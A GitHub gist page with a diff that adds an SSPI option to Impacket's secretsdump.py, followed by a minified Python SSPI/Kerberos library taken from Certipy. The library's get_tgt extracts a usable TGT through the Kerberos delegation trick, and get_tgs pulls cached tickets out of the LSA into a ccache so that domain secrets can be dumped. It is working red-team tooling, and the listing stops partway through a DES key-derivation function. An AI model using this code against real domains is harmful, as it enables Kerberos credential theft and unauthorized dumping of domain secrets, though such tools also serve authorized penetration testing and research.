-
-
Save snovvcrash/ff867dbd922ff2c36f480c0a61819f29 to your computer and use it in GitHub Desktop.
Minified version of Python SSPI lib stolen from @ly4k's Certipy (https://github.com/ly4k/Certipy/tree/2780d5361121dd4ec79da3f64cfb1984c4f779c6/certipy/lib/sspi)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
diff --git a/examples/secretsdump.py b/examples/secretsdump.py | |
index a881a8ce..df72fd30 100755 | |
--- a/examples/secretsdump.py | |
+++ b/examples/secretsdump.py | |
@@ -397,6 +397,7 @@ if __name__ == '__main__': | |
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication' | |
' (128 or 256 bits)') | |
group.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file') | |
+ group.add_argument('-sspi', action="store_true", help='Use Windows Integrated Authentication (SSPI)') | |
group = parser.add_argument_group('connection') | |
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ' | |
@@ -465,7 +466,7 @@ if __name__ == '__main__': | |
Keytab.loadKeysFromKeytab(options.keytab, username, domain, options) | |
options.k = True | |
- if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: | |
+ if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None and options.sspi is False: | |
from getpass import getpass | |
password = getpass("Password:") | |
@@ -473,6 +474,24 @@ if __name__ == '__main__': | |
if options.aesKey is not None: | |
options.k = True | |
+ if options.sspi: | |
+ import platform | |
+ if platform.system().lower() != 'windows': | |
+ logging.error('Cannot use SSPI on non-Windows platform') | |
+ sys.exit(1) | |
+ import random, string, ntpath, tempfile | |
+ from impacket.sspi import get_tgt | |
+ dcName = os.environ['LOGONSERVER'].strip('\\') + f'.{os.environ["USERDNSDOMAIN"]}' | |
+ targetSPN = f'HOST/{dcName}' | |
+ logging.debug(f'Trying to get TGS for {repr(targetSPN)} via SSPI') | |
+ ccache = get_tgt(targetSPN) | |
+ ccacheName = ''.join([random.choice(string.ascii_letters) for _ in range(8)]) + '.ccache' | |
+ ccachePath = ntpath.join(tempfile.gettempdir(), ccacheName) | |
+ logging.debug(f'Saving temporary Kerberos Cache: {ccachePath}') | |
+ ccache.saveFile(ccachePath) | |
+ os.environ['KRB5CCNAME'] = ccachePath | |
+ options.k = options.no_pass = True | |
+ | |
dumper = DumpSecrets(remoteName, username, password, domain, options) | |
try: | |
dumper.dump() | |
@@ -481,3 +500,8 @@ if __name__ == '__main__':
             import traceback
             traceback.print_exc()
         logging.error(e)
+    finally:
+        if options.sspi:
+            # ccachePath is only bound inside the `if options.sspi:` branch above;
+            # without this guard every non-SSPI run would end in a NameError.
+            logging.debug(f'Removing temporary Kerberos Cache: {ccachePath}')
+            os.remove(ccachePath)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Reference: https://github.com/ly4k/Certipy/tree/main/certipy/lib/sspi | |
# Author: https://twitter.com/ly4k_ | |
import os | |
import io | |
import enum | |
import string | |
import functools | |
from math import gcd | |
from typing import Dict | |
from struct import pack, unpack | |
from ctypes import ( | |
POINTER, | |
Structure, | |
WinError, | |
addressof, | |
byref, | |
c_byte, | |
c_char, | |
c_char_p, | |
c_int16, | |
c_int32, | |
c_longlong, | |
c_ubyte, | |
c_uint16, | |
c_uint32, | |
c_void_p, | |
cast, | |
create_string_buffer, | |
pointer, | |
sizeof, | |
string_at, | |
windll | |
) | |
from asn1crypto import core | |
from unicrypto import hmac as HMAC | |
from unicrypto.hashlib import md4 | |
from unicrypto.hashlib import md5 as MD5 | |
from unicrypto.hashlib import sha1 as SHA | |
from unicrypto.pbkdf2 import pbkdf2 as PBKDF2 | |
from unicrypto.symmetric import AES, DES, MODE_CBC, MODE_ECB | |
from unicrypto.symmetric import RC4 as ARC4 | |
from unicrypto.symmetric import TDES as DES3 | |
from impacket.krb5.ccache import CCache | |
# -- kerberos.py ----------------------------------------------------- | |
def submit_ticket(ticket_data: bytes):
    """Hand ``ticket_data`` to the LSA "kerberos" authentication package.

    The ticket is wrapped by ``submit_tkt_helper`` (with ``logonid=0``) and
    sent over an untrusted LSA connection.

    Returns:
        ``True`` when the package reports status 0.

    Raises:
        The exception built by ``get_lsa_error`` for any non-zero status.
    """
    handle = LsaConnectUntrusted()
    package_id = LsaLookupAuthenticationPackage(handle, "kerberos")
    request = submit_tkt_helper(ticket_data, logonid=0)
    response, status, response_ptr = LsaCallAuthenticationPackage(
        handle, package_id, request
    )

    if status == 0:
        # Only a non-empty reply owns a buffer that has to be released.
        if len(response) > 0:
            LsaFreeReturnBuffer(response_ptr)
        return True

    raise get_lsa_error(status)
def get_tgt(target: str) -> CCache:
    """Extract the forwarded credential that SSPI embeds when delegating to ``target``.

    An outbound Kerberos security context is initialised with the DELEGATE
    flag.  The resulting AP-REQ authenticator is decrypted with the session
    key of the cached ticket for ``target``; its GSS checksum (type 0x8003)
    carries a KRB-CRED in the delegation data.  That KRB-CRED is decrypted
    and re-wrapped with etype 0 (plaintext) so ``CCache.fromKRBCRED`` can
    read it.

    Returns:
        The populated ``CCache``, or ``None`` when ``InitializeSecurityContext``
        reports neither ``SEC_E.OK`` nor ``SEC_E.CONTINUE_NEEDED``.

    Raises:
        Exception: "Bad checksum" if the authenticator checksum type is not
            0x8003; "Delegation flag not set" if the checksum flags lack
            ``GSS_C_DELEG_FLAG``.

    NOTE(review): the listing this was restored from had lost its
    indentation; the whole remainder is assumed to sit inside the
    ``if res == ...`` branch -- confirm against the upstream file.
    """
    cred_handle = AcquireCredentialsHandle(
        None, "kerberos", target, SECPKG_CRED.OUTBOUND
    )
    res, _, data, _, _ = InitializeSecurityContext(
        cred_handle,
        target,
        token=None,
        ctx=cred_handle,
        flags=ISC_REQ.DELEGATE | ISC_REQ.MUTUAL_AUTH | ISC_REQ.ALLOCATE_MEMORY,
    )
    if res != SEC_E.OK and res != SEC_E.CONTINUE_NEEDED:
        return None

    # Session key of the cached ticket for `target`, fetched through the LSA.
    lsa = LsaConnectUntrusted()
    package_id = LsaLookupAuthenticationPackage(lsa, "kerberos")
    cached = extract_ticket(lsa, package_id, 0, target)
    session_key = Key(cached["Key"]["KeyType"], cached["Key"]["Key"])

    # Unwrap the GSS token down to the AP-REQ and decrypt its authenticator.
    gss_token = InitialContextToken.load(data[0][1])
    ap_req = AP_REQ(gss_token.native["innerContextToken"]).native
    profile = _enctype_table[ap_req["authenticator"]["etype"]]
    # Key usage 11: AP-REQ authenticator (RFC 4120).
    authenticator_der = profile.decrypt(
        session_key, 11, ap_req["authenticator"]["cipher"]
    )
    authenticator = Authenticator.load(authenticator_der).native

    if authenticator["cksum"]["cksumtype"] != 0x8003:
        raise Exception("Bad checksum")
    gss_checksum = AuthenticatorChecksum.from_bytes(authenticator["cksum"]["checksum"])
    if ChecksumFlags.GSS_C_DELEG_FLAG not in gss_checksum.flags:
        raise Exception("Delegation flag not set")

    # Key usage 14: encrypted part of a KRB-CRED (RFC 4120).
    forwarded = KRB_CRED.load(gss_checksum.delegation_data).native
    cred_plain = profile.decrypt(session_key, 14, forwarded["enc-part"]["cipher"])

    # Re-wrap with etype 0 so the enc-part carries the decrypted bytes as-is.
    plain_enc_part = EncryptedData({"etype": 0, "cipher": cred_plain})
    krb_cred = KRB_CRED(
        {
            "pvno": forwarded["pvno"],
            "msg-type": forwarded["msg-type"],
            "tickets": forwarded["tickets"],
            "enc-part": plain_enc_part,
        }
    )

    ccache = CCache()
    ccache.fromKRBCRED(krb_cred.dump())
    return ccache
# get_tgs: build a CCache from the ticket the LSA holds for `target`.
#
# Steps visible in the body:
#   1. Acquire an outbound "kerberos" credential handle and initialise a
#      security context for `target` (ALLOCATE_MEMORY | CONNECTION).
#   2. When that reports SEC_E.OK / SEC_E.CONTINUE_NEEDED, query the session
#      key and parse the output token.  Neither result is stored: the bare
#      `sec_struct.Buffer` expression and the `InitialContextToken.load(...)`
#      value are discarded.
#   3. Open an untrusted LSA connection, look up the "kerberos" package and
#      call extract_ticket(lsa_handle, package_id, 0, target).
#   4. Load raw_ticket["Ticket"] as a KRB_CRED and feed its DER dump to
#      CCache.fromKRBCRED; the CCache is returned.
#
# NOTE(review): this listing has lost its indentation, so it cannot be told
# from here whether steps 3-4 sit inside the `if res == ...` branch or after
# it -- confirm against the upstream file before restructuring.
def get_tgs(target: str) -> CCache: | |
# can be skipped - start | |
ctx = AcquireCredentialsHandle(None, "kerberos", target, SECPKG_CRED.OUTBOUND) | |
res, ctx, data, _, _ = InitializeSecurityContext( | |
ctx, | |
target, | |
token=None, | |
ctx=ctx, | |
flags=ISC_REQ.ALLOCATE_MEMORY | ISC_REQ.CONNECTION, | |
) | |
if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED: | |
sec_struct = SecPkgContext_SessionKey() | |
QueryContextAttributes(ctx, SECPKG_ATTR.SESSION_KEY, sec_struct) | |
sec_struct.Buffer | |
InitialContextToken.load(data[0][1]).native["innerContextToken"] | |
# can be skipped - end | |
lsa_handle = LsaConnectUntrusted() | |
kerberos_package_id = LsaLookupAuthenticationPackage(lsa_handle, "kerberos") | |
raw_ticket = extract_ticket(lsa_handle, kerberos_package_id, 0, target) | |
krb_cred = KRB_CRED.load(raw_ticket["Ticket"]) | |
ccache = CCache() | |
ccache.fromKRBCRED(krb_cred.dump()) | |
return ccache | |
# -- structs.py ------------------------------------------------------ | |
def _to_pascal_case(snake_str: str) -> str: | |
components = snake_str.split("_") | |
return "".join(x.title() for x in components) | |
def _high_bit(value): | |
return value.bit_length() - 1 | |
def _decompose(flag, value): | |
not_covered = value | |
negative = value < 0 | |
members = [] | |
for member in flag: | |
member_value = member.value | |
if member_value and member_value & value == member_value: | |
members.append(member) | |
not_covered &= ~member_value | |
if not negative: | |
tmp = not_covered | |
while tmp: | |
flag_value = 2 ** _high_bit(tmp) | |
if flag_value in flag._value2member_map_: | |
members.append(flag._value2member_map_[flag_value]) | |
not_covered &= ~flag_value | |
tmp &= ~flag_value | |
if not members and value in flag._value2member_map_: | |
members.append(flag._value2member_map_[value]) | |
members.sort(key=lambda m: m._value_, reverse=True) | |
if len(members) > 1 and members[0].value == value: | |
members.pop(0) | |
return members, not_covered | |
class IntFlag(enum.IntFlag):
    """``enum.IntFlag`` whose ``str``/``repr`` use PascalCase member names."""

    def to_list(self):
        """Return the members that make up this value."""
        parts, _ = _decompose(self.__class__, self._value_)
        return parts

    def to_str_list(self):
        """Return ``str()`` of every member that makes up this value."""
        return [str(part) for part in self.to_list()]

    def __str__(self):
        if self._name_ is not None:
            return _to_pascal_case(self._name_)

        parts, _ = _decompose(self.__class__, self._value_)
        if len(parts) == 1 and parts[0]._name_ is None:
            return repr(parts[0]._value_)

        labels = [_to_pascal_case(str(part._name_ or part._value_)) for part in parts]
        return ", ".join(labels)

    def __repr__(self):
        return str(self)
# Class number used as the first element of the ``explicit`` tuples below.
APPLICATION = 1
# Value passed as "tag_type" in the ASN.1 field specifications below.
TAG = "explicit"
class krb5int32(core.Integer):
    """Marker subclass of ``core.Integer``; adds no behaviour of its own."""
class krb5uint32(core.Integer):
    """Marker subclass of ``core.Integer``; adds no behaviour of its own."""
class KerberosString(core.GeneralString):
    """Marker subclass of ``core.GeneralString``; adds no behaviour of its own."""
class SequenceOfKerberosString(core.SequenceOf):
    """ASN.1 SEQUENCE OF whose elements are ``KerberosString``."""

    _child_spec = KerberosString
class Realm(KerberosString):
    """Marker subclass of ``KerberosString``; adds no behaviour of its own."""
class PrincipalName(core.Sequence):
    """ASN.1 SEQUENCE with ``name-type`` [0] and ``name-string`` [1]."""

    _fields = [
        ("name-type", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("name-string", SequenceOfKerberosString, {"tag_type": TAG, "tag": 1}),
    ]
class KerberosTime(core.GeneralizedTime):
    """Marker subclass of ``core.GeneralizedTime``; adds no behaviour of its own."""
class AuthorizationDataElement(core.Sequence):
    """ASN.1 SEQUENCE with ``ad-type`` [0] and ``ad-data`` [1]."""

    _fields = [
        ("ad-type", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("ad-data", core.OctetString, {"tag_type": TAG, "tag": 1}),
    ]
class AuthorizationData(core.SequenceOf):
    """ASN.1 SEQUENCE OF whose elements are ``AuthorizationDataElement``."""

    _child_spec = AuthorizationDataElement
class APOptions(core.BitString):
    """ASN.1 BIT STRING with names for bits 0-2."""

    _map = {
        0: "reserved",
        1: "use-session-key",
        2: "mutual-required",
    }
class EncryptedData(core.Sequence):
    """ASN.1 SEQUENCE with ``etype`` [0], optional ``kvno`` [1] and ``cipher`` [2]."""

    _fields = [
        ("etype", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("kvno", krb5uint32, {"tag_type": TAG, "tag": 1, "optional": True}),
        ("cipher", core.OctetString, {"tag_type": TAG, "tag": 2}),
    ]
class EncryptionKey(core.Sequence):
    """ASN.1 SEQUENCE with ``keytype`` [0] and ``keyvalue`` [1]."""

    _fields = [
        ("keytype", krb5uint32, {"tag_type": TAG, "tag": 0}),
        ("keyvalue", core.OctetString, {"tag_type": TAG, "tag": 1}),
    ]
class Ticket(core.Sequence):
    """ASN.1 SEQUENCE explicitly tagged ``(APPLICATION, 1)``.

    Fields: ``tkt-vno`` [0], ``realm`` [1], ``sname`` [2], ``enc-part`` [3].
    """

    explicit = (APPLICATION, 1)
    _fields = [
        ("tkt-vno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("realm", Realm, {"tag_type": TAG, "tag": 1}),
        ("sname", PrincipalName, {"tag_type": TAG, "tag": 2}),
        ("enc-part", EncryptedData, {"tag_type": TAG, "tag": 3}),
    ]
class SequenceOfTicket(core.SequenceOf):
    """ASN.1 SEQUENCE OF whose elements are ``Ticket``."""

    _child_spec = Ticket
class Checksum(core.Sequence):
    """ASN.1 SEQUENCE with ``cksumtype`` [0] and ``checksum`` [1]."""

    _fields = [
        ("cksumtype", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("checksum", core.OctetString, {"tag_type": TAG, "tag": 1}),
    ]
class Authenticator(core.Sequence):
    """ASN.1 SEQUENCE explicitly tagged ``(APPLICATION, 2)``.

    ``cksum``, ``subkey``, ``seq-number`` and ``authorization-data`` are
    optional; the remaining fields are required.
    """

    explicit = (APPLICATION, 2)
    _fields = [
        ("authenticator-vno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("crealm", Realm, {"tag_type": TAG, "tag": 1}),
        ("cname", PrincipalName, {"tag_type": TAG, "tag": 2}),
        ("cksum", Checksum, {"tag_type": TAG, "tag": 3, "optional": True}),
        ("cusec", krb5int32, {"tag_type": TAG, "tag": 4}),
        ("ctime", KerberosTime, {"tag_type": TAG, "tag": 5}),
        ("subkey", EncryptionKey, {"tag_type": TAG, "tag": 6, "optional": True}),
        ("seq-number", krb5uint32, {"tag_type": TAG, "tag": 7, "optional": True}),
        ("authorization-data", AuthorizationData, {"tag_type": TAG, "tag": 8, "optional": True}),
    ]
class AP_REQ(core.Sequence):
    """ASN.1 SEQUENCE explicitly tagged ``(APPLICATION, 14)``.

    Fields: ``pvno`` [0], ``msg-type`` [1], ``ap-options`` [2], ``ticket`` [3],
    ``authenticator`` [4] (an ``EncryptedData``).
    """

    explicit = (APPLICATION, 14)
    _fields = [
        ("pvno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("msg-type", krb5int32, {"tag_type": TAG, "tag": 1}),
        ("ap-options", APOptions, {"tag_type": TAG, "tag": 2}),
        ("ticket", Ticket, {"tag_type": TAG, "tag": 3}),
        ("authenticator", EncryptedData, {"tag_type": TAG, "tag": 4}),
    ]
class KRB_CRED(core.Sequence):
    """ASN.1 SEQUENCE explicitly tagged ``(APPLICATION, 22)``.

    Fields: ``pvno`` [0], ``msg-type`` [1], ``tickets`` [2], ``enc-part`` [3].
    """

    explicit = (APPLICATION, 22)
    _fields = [
        ("pvno", core.Integer, {"tag_type": TAG, "tag": 0}),
        ("msg-type", core.Integer, {"tag_type": TAG, "tag": 1}),
        ("tickets", SequenceOfTicket, {"tag_type": TAG, "tag": 2}),
        ("enc-part", EncryptedData, {"tag_type": TAG, "tag": 3}),
    ]
class MechType(core.ObjectIdentifier):
    """OBJECT IDENTIFIER with readable names for the listed security mechanisms."""

    _map = {
        "1.3.6.1.4.1.311.2.2.10": "NTLMSSP - Microsoft NTLM Security Support Provider",
        "1.2.840.48018.1.2.2": "MS KRB5 - Microsoft Kerberos 5",
        "1.2.840.113554.1.2.2": "KRB5 - Kerberos 5",
        "1.2.840.113554.1.2.2.3": "KRB5 - Kerberos 5 - User to User",
        "1.3.6.1.4.1.311.2.2.30": "NEGOEX - SPNEGO Extended Negotiation Security Mechanism",
    }
class InitialContextToken(core.Sequence):
    """Token wrapper declared with ``class_ = 1`` and ``tag = 0``.

    Holds ``thisMech``, ``unk_bool`` and ``innerContextToken``.  The
    ``_oid_pair`` / ``_oid_specs`` pair selects ``AP_REQ`` as the spec for
    ``innerContextToken`` when ``thisMech`` is "KRB5 - Kerberos 5".
    """

    class_ = 1
    tag = 0

    _fields = [
        ("thisMech", MechType, {"optional": False}),
        ("unk_bool", core.Boolean, {"optional": False}),
        ("innerContextToken", core.Any, {"optional": False}),
    ]

    _oid_pair = ("thisMech", "innerContextToken")
    _oid_specs = {
        "KRB5 - Kerberos 5": AP_REQ,
    }
class ChecksumFlags(enum.IntFlag):
    """Bits of the 4-byte flags field read by ``AuthenticatorChecksum``."""

    GSS_C_DELEG_FLAG = 1
    GSS_C_MUTUAL_FLAG = 2
    GSS_C_REPLAY_FLAG = 4
    GSS_C_SEQUENCE_FLAG = 8
    GSS_C_CONF_FLAG = 16
    GSS_C_INTEG_FLAG = 32
    GSS_C_DCE_STYLE = 0x1000


class AuthenticatorChecksum:
    """Parsed form of the checksum blob carried in an authenticator.

    Layout handled by ``from_buffer`` / ``to_bytes`` (all integers
    little-endian): 4-byte binding length, channel binding, 4-byte flags and,
    only when ``GSS_C_DELEG_FLAG`` is set, a 2-byte delegation option, a
    2-byte delegation length and the delegation data.  Whatever follows is
    kept verbatim in ``extensions``.
    """

    def __init__(self):
        self.length_of_binding = None
        self.channel_binding = None
        self.flags = None
        self.delegation = None
        self.delegation_length = None
        self.delegation_data = None
        self.extensions = None

    @staticmethod
    def from_bytes(data):
        """Parse ``data`` (bytes) into an ``AuthenticatorChecksum``."""
        return AuthenticatorChecksum.from_buffer(io.BytesIO(data))

    @staticmethod
    def from_buffer(buffer):
        """Parse an ``AuthenticatorChecksum`` from a binary file-like object.

        Short input is not rejected: fields past the end of the data are
        decoded from whatever ``buffer.read`` returns.
        """
        ac = AuthenticatorChecksum()
        ac.length_of_binding = int.from_bytes(
            buffer.read(4), byteorder="little", signed=False
        )
        ac.channel_binding = buffer.read(ac.length_of_binding)
        ac.flags = ChecksumFlags(
            int.from_bytes(buffer.read(4), byteorder="little", signed=False)
        )
        if ac.flags & ChecksumFlags.GSS_C_DELEG_FLAG:
            ac.delegation = bool(
                int.from_bytes(buffer.read(2), byteorder="little", signed=False)
            )
            ac.delegation_length = int.from_bytes(
                buffer.read(2), byteorder="little", signed=False
            )
            ac.delegation_data = buffer.read(ac.delegation_length)
        ac.extensions = buffer.read()
        return ac

    @staticmethod
    def _raw(value):
        """Return ``value`` as bytes.

        ``from_buffer`` stores plain ``bytes``, which have no ``to_bytes()``
        method; objects that do expose ``to_bytes()`` are still accepted so
        existing callers that assign such objects keep working.
        """
        if isinstance(value, (bytes, bytearray, memoryview)):
            return bytes(value)
        return value.to_bytes()

    def to_bytes(self):
        """Serialise back to the wire layout read by ``from_buffer``."""
        out = len(self.channel_binding).to_bytes(4, byteorder="little", signed=False)
        out += self.channel_binding
        out += int(self.flags).to_bytes(4, byteorder="little", signed=False)
        if self.flags & ChecksumFlags.GSS_C_DELEG_FLAG:
            delegation_blob = self._raw(self.delegation_data)
            out += int(self.delegation).to_bytes(2, byteorder="little", signed=False)
            out += len(delegation_blob).to_bytes(2, byteorder="little", signed=False)
            out += delegation_blob
        if self.extensions:
            out += self._raw(self.extensions)
        return out
# -- encryption.py --------------------------------------------------- | |
def get_random_bytes(lenBytes):
    """Return ``lenBytes`` bytes from ``os.urandom``."""
    random_block = os.urandom(lenBytes)
    return random_block
class Enctype:
    """Numeric identifiers of the encryption types referenced in this module."""

    # Single-DES variants
    DES_CRC = 1
    DES_MD4 = 2
    DES_MD5 = 3
    # Triple-DES
    DES3 = 16
    # AES
    AES128 = 17
    AES256 = 18
    # RC4
    RC4 = 23
class Cksumtype:
    """Numeric identifiers of the checksum types referenced in this module."""

    CRC32 = 1
    MD4 = 2
    MD4_DES = 3
    MD5 = 7
    MD5_DES = 8
    SHA1 = 9
    SHA1_DES3 = 12
    SHA1_AES128 = 15
    SHA1_AES256 = 16
    # The only negative identifier in the set.
    HMAC_MD5 = -138
class InvalidChecksum(ValueError):
    """Raised when a MAC or checksum does not match the expected value."""
def _zeropad(s, padsize): | |
padlen = (padsize - (len(s) % padsize)) % padsize | |
return s + b"\x00" * padlen | |
def _xorbytes(b1, b2): | |
assert len(b1) == len(b2) | |
t1 = int.from_bytes(b1, byteorder="big", signed=False) | |
t2 = int.from_bytes(b2, byteorder="big", signed=False) | |
return (t1 ^ t2).to_bytes(len(b1), byteorder="big", signed=False) | |
def _mac_equal(mac1, mac2): | |
assert len(mac1) == len(mac2) | |
res = 0 | |
for x, y in zip(mac1, mac2): | |
res |= x ^ y | |
return res == 0 | |
def _nfold(str, nbytes): | |
def rotate_right(str, nbits): | |
num = int.from_bytes(str, byteorder="big", signed=False) | |
size = len(str) * 8 | |
nbits %= size | |
body = num >> nbits | |
remains = (num << (size - nbits)) - (body << size) | |
return (body + remains).to_bytes(len(str), byteorder="big", signed=False) | |
def add_ones_complement(str1, str2): | |
n = len(str1) | |
v = [] | |
for i in range(0, len(str1), 1): | |
t = str1[i] + str2[i] | |
v.append(t) | |
while any(x & ~0xFF for x in v): | |
v = [(v[i - n + 1] >> 8) + (v[i] & 0xFF) for i in range(n)] | |
return b"".join(x.to_bytes(1, byteorder="big", signed=False) for x in v) | |
slen = len(str) | |
lcm = int(nbytes * slen / gcd(nbytes, slen)) | |
bigstr = b"".join((rotate_right(str, 13 * i) for i in range(int(lcm / slen)))) | |
slices = (bigstr[p : p + nbytes] for p in range(0, lcm, nbytes)) | |
return functools.reduce(add_ones_complement, slices) | |
def _is_weak_des_key(keybytes): | |
return keybytes in ( | |
b"\x01\x01\x01\x01\x01\x01\x01\x01", | |
b"\xFE\xFE\xFE\xFE\xFE\xFE\xFE\xFE", | |
b"\x1F\x1F\x1F\x1F\x0E\x0E\x0E\x0E", | |
b"\xE0\xE0\xE0\xE0\xF1\xF1\xF1\xF1", | |
b"\x01\xFE\x01\xFE\x01\xFE\x01\xFE", | |
b"\xFE\x01\xFE\x01\xFE\x01\xFE\x01", | |
b"\x1F\xE0\x1F\xE0\x0E\xF1\x0E\xF1", | |
b"\xE0\x1F\xE0\x1F\xF1\x0E\xF1\x0E", | |
b"\x01\xE0\x01\xE0\x01\xF1\x01\xF1", | |
b"\xE0\x01\xE0\x01\xF1\x01\xF1\x01", | |
b"\x1F\xFE\x1F\xFE\x0E\xFE\x0E\xFE", | |
b"\xFE\x1F\xFE\x1F\xFE\x0E\xFE\x0E", | |
b"\x01\x1F\x01\x1F\x01\x0E\x01\x0E", | |
b"\x1F\x01\x1F\x01\x0E\x01\x0E\x01", | |
b"\xE0\xFE\xE0\xFE\xF1\xFE\xF1\xFE", | |
b"\xFE\xE0\xFE\xE0\xFE\xF1\xFE\xF1", | |
) | |
class _EnctypeProfile(object): | |
@classmethod | |
def random_to_key(cls, seed): | |
if len(seed) != cls.seedsize: | |
raise ValueError("Wrong seed length") | |
return Key(cls.enctype, seed) | |
class _SimplifiedEnctype(_EnctypeProfile):
    """Shared derive / encrypt / decrypt / prf logic for block-cipher profiles.

    Subclasses provide ``blocksize``, ``seedsize``, ``padsize``, ``macsize``
    and ``hashmod`` plus ``basic_encrypt`` / ``basic_decrypt``.
    """

    @classmethod
    def derive(cls, key, constant):
        """Derive a new key from ``key`` and the byte string ``constant``.

        ``constant`` is n-folded to one block, then repeatedly encrypted
        (each output feeding the next round) until ``seedsize`` bytes are
        available for ``random_to_key``.
        """
        plaintext = _nfold(constant, cls.blocksize)
        rndseed = b""
        while len(rndseed) < cls.seedsize:
            ciphertext = cls.basic_encrypt(key, plaintext)
            rndseed += ciphertext
            plaintext = ciphertext
        return cls.random_to_key(rndseed[0 : cls.seedsize])

    @classmethod
    def encrypt(cls, key, keyusage, plaintext, confounder):
        """Encrypt ``plaintext`` and append a truncated HMAC over the plaintext.

        ``confounder`` may be ``None``, in which case one random block is used.
        """
        ki = cls.derive(key, pack(">IB", keyusage, 0x55))
        ke = cls.derive(key, pack(">IB", keyusage, 0xAA))
        if confounder is None:
            confounder = get_random_bytes(cls.blocksize)
        basic_plaintext = confounder + _zeropad(plaintext, cls.padsize)
        hmac = HMAC.new(ki.contents, basic_plaintext, cls.hashmod).digest()
        return cls.basic_encrypt(ke, basic_plaintext) + hmac[: cls.macsize]

    @classmethod
    def decrypt(cls, key, keyusage, ciphertext):
        """Verify the trailing MAC and return the plaintext without the confounder.

        Raises:
            ValueError: ciphertext shorter than one block plus the MAC, or not
                a multiple of ``padsize``.
            InvalidChecksum: the MAC does not match.
        """
        ki = cls.derive(key, pack(">IB", keyusage, 0x55))
        ke = cls.derive(key, pack(">IB", keyusage, 0xAA))
        if len(ciphertext) < cls.blocksize + cls.macsize:
            raise ValueError("ciphertext too short")
        basic_ctext, mac = ciphertext[: -cls.macsize], ciphertext[-cls.macsize :]
        if len(basic_ctext) % cls.padsize != 0:
            raise ValueError("ciphertext does not meet padding requirement")
        basic_plaintext = cls.basic_decrypt(ke, basic_ctext)
        hmac = HMAC.new(ki.contents, basic_plaintext, cls.hashmod).digest()
        expmac = hmac[: cls.macsize]
        if not _mac_equal(mac, expmac):
            raise InvalidChecksum("ciphertext integrity failure")
        return basic_plaintext[cls.blocksize :]

    @classmethod
    def prf(cls, key, string):
        """Encrypt the block-aligned prefix of ``hash(string)`` with a derived key."""
        hashval = cls.hashmod(string).digest()
        # Keep the largest prefix that is a whole number of blocks.  A slice
        # of the form hashval[:-(len % blocksize)] collapses to an empty
        # string whenever the digest is already block-aligned ([:-0] == [:0]).
        usable = len(hashval) - len(hashval) % cls.blocksize
        truncated = hashval[:usable]
        kp = cls.derive(key, b"prf")
        return cls.basic_encrypt(kp, truncated)
class _DESCBC(_SimplifiedEnctype):
    """DES-CBC profile using an embedded MD5 checksum (enctype ``DES_MD5``).

    Differences from the previous revision, all needed for Python 3:
    the zeroed checksum placeholder is ``bytes`` (it is concatenated with
    ``bytes``); the hash is created with ``cls.hashmod(...)`` like the rest
    of this file; and the weak-key fix-ups rebuild the key, because ``bytes``
    objects do not support item assignment.
    """

    enctype = Enctype.DES_MD5
    keysize = 8
    seedsize = 8
    blocksize = 8
    padsize = 8
    macsize = 16
    hashmod = MD5

    @classmethod
    def encrypt(cls, key, keyusage, plaintext, confounder):
        """Encrypt ``confounder || checksum || padded plaintext`` with ``key``.

        The checksum is computed over the same layout with the checksum
        field zeroed.  ``keyusage`` is accepted for interface parity and is
        not used.
        """
        if confounder is None:
            confounder = get_random_bytes(cls.blocksize)
        basic_plaintext = (
            confounder + b"\x00" * cls.macsize + _zeropad(plaintext, cls.padsize)
        )
        checksum = cls.hashmod(basic_plaintext).digest()
        basic_plaintext = (
            basic_plaintext[: len(confounder)]
            + checksum
            + basic_plaintext[len(confounder) + len(checksum) :]
        )
        return cls.basic_encrypt(key, basic_plaintext)

    @classmethod
    def decrypt(cls, key, keyusage, ciphertext):
        """Decrypt, verify the embedded checksum and return the message.

        Raises:
            ValueError: ciphertext shorter than one block plus the checksum.
            InvalidChecksum: the embedded checksum does not match.
        """
        if len(ciphertext) < cls.blocksize + cls.macsize:
            raise ValueError("ciphertext too short")
        complex_plaintext = cls.basic_decrypt(key, ciphertext)
        confounder = complex_plaintext[: cls.padsize]
        mac = complex_plaintext[cls.padsize : cls.padsize + cls.macsize]
        message = complex_plaintext[cls.padsize + cls.macsize :]
        expmac = cls.hashmod(confounder + b"\x00" * cls.macsize + message).digest()
        if not _mac_equal(mac, expmac):
            raise InvalidChecksum("ciphertext integrity failure")
        return message

    @classmethod
    def mit_des_string_to_key(cls, string, salt):
        """Derive a DES key from the byte strings ``string`` and ``salt``."""

        def fixparity(deskey):
            # Rewrite the low bit of every byte from the count of set bits
            # in its upper seven bits.
            temp = b""
            for byte in deskey:
                t = (bin(byte)[2:]).rjust(8, "0")
                if t[:7].count("1") % 2 == 0:
                    temp += int(t[:7] + "1", 2).to_bytes(
                        1, byteorder="big", signed=False
                    )
                else:
                    temp += int(t[:7] + "0", 2).to_bytes(
                        1, byteorder="big", signed=False
                    )
            return temp

        def addparity(l1):
            # Shift each 7-bit value left by one and fill in the parity bit.
            temp = list()
            for byte in l1:
                if (bin(byte).count("1") % 2) == 0:
                    byte = (byte << 1) | 0b00000001
                else:
                    byte = (byte << 1) & 0b11111110
                temp.append(byte)
            return temp

        def XOR(l1, l2):
            temp = list()
            for b1, b2 in zip(l1, l2):
                temp.append((b1 ^ b2) & 0b01111111)
            return temp

        odd = True
        s = string + salt
        tempstring = [0, 0, 0, 0, 0, 0, 0, 0]
        # NOTE(review): this appends a full block of zeros when len(s) is
        # already a multiple of 8 -- confirm that is intended.
        s = s + b"\x00" * (8 - (len(s) % 8))
        for block in [s[i : i + 8] for i in range(0, len(s), 8)]:
            temp56 = list()
            for byte in block:
